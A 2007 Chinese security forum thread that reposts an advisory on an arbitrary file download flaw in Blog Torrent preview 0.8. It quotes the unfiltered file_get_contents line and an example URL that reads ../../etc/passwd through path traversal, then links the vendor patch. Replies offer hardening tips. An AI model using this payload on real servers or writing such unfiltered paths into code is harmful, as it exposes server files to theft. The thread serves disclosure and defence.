返回列表 发帖

主题
积分
贝壳
0 个 
性别
男 
注册时间
2007-3-30 
最后登录
2007-6-24 

技术勋章贡献勋章
楼主 跳转到 » 倒序看帖
打印
tT
stylehack发表于 2007-4-1 00:06 | 只看该作者

[转载] PHPBlog流行BT下载程序v0.8任意文件下载漏洞

受影响版本:
Blog Torrent preview 0.8
这是一个国外的流行BT下载程序的漏洞,由于btdownload.php过滤不严导致远程
攻击者下载web服务器里任意文件。
但是文件必须被运行web服务器的 UID 所能读。
漏洞分析:
在btdownload.php里原文件如下:
--
echo file_get_contents(torrents/.$_GET[file]);
--
看到了没有,$_GET[file]可以直接被替换,如果file=../../etc/passwd则可以下载到服务器的密码,(只要运行web服务器的 UID 有权限读。)
攻击方法:
http://example.org/battletorrent/bt/btdownload.php?
type=torrent&file=../../etc/passwd
厂商补丁:
Blog Torrent
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://cvs.sourceforge.net/viewcvs.py/battletorrent/btorrent_server/btdownload.php?r1=1.6&r2=1.7
相关动画:
http://www.918x.com/showsoft.asp?soft_id=134
收藏 分享
http://www.sylehack.cn
自古英雄出我辈.一入网络岁月催.识尽网络千机变.回头才知一场空.

主题
积分
271 
贝壳
271 个 
性别
男 
来自
深山 老林 
注册时间
2002-11-8 
最后登录
2009-1-6 
沙发
黑色叶子发表于 2007-4-4 07:32 | 只看该作者
数据库到IIS里设置不可读就可以了
天空中不曾留下鸟飞的痕迹
但我们毕竟曾经努力的飞过
╱◥█◣ ╱◥█◣
︱田︱田︱︱田︱田︱
╬╬╬╬╬╬╬╬╬╬╬╬╬╬
      ● ╭○╮
    /█∨█\
      ∏    ∏  BLOG:http://blackleaf.thysea.com
天空中不曾留下鸟飞的痕迹
但我们毕竟曾经努力的飞过

TOP

主题
积分
854 
贝壳
854 个 
性别
男 
来自
贵州遵义 
注册时间
2005-3-26 
最后登录
2011-2-26 

技术勋章热情勋章勤劳勋章
板凳
chinanic发表于 2007-4-6 03:44 | 只看该作者
嗯。一般WEB目录以外的地方都删掉Everyone
天行健,君子以自强不息
地势坤,君子以厚德载物
黑色海岸线欢迎您
QQ群:7212260
致力于探索WEB技术精髓:http://www.bitechcn.com
点这里加我!

TOP

返回列表 回复 发帖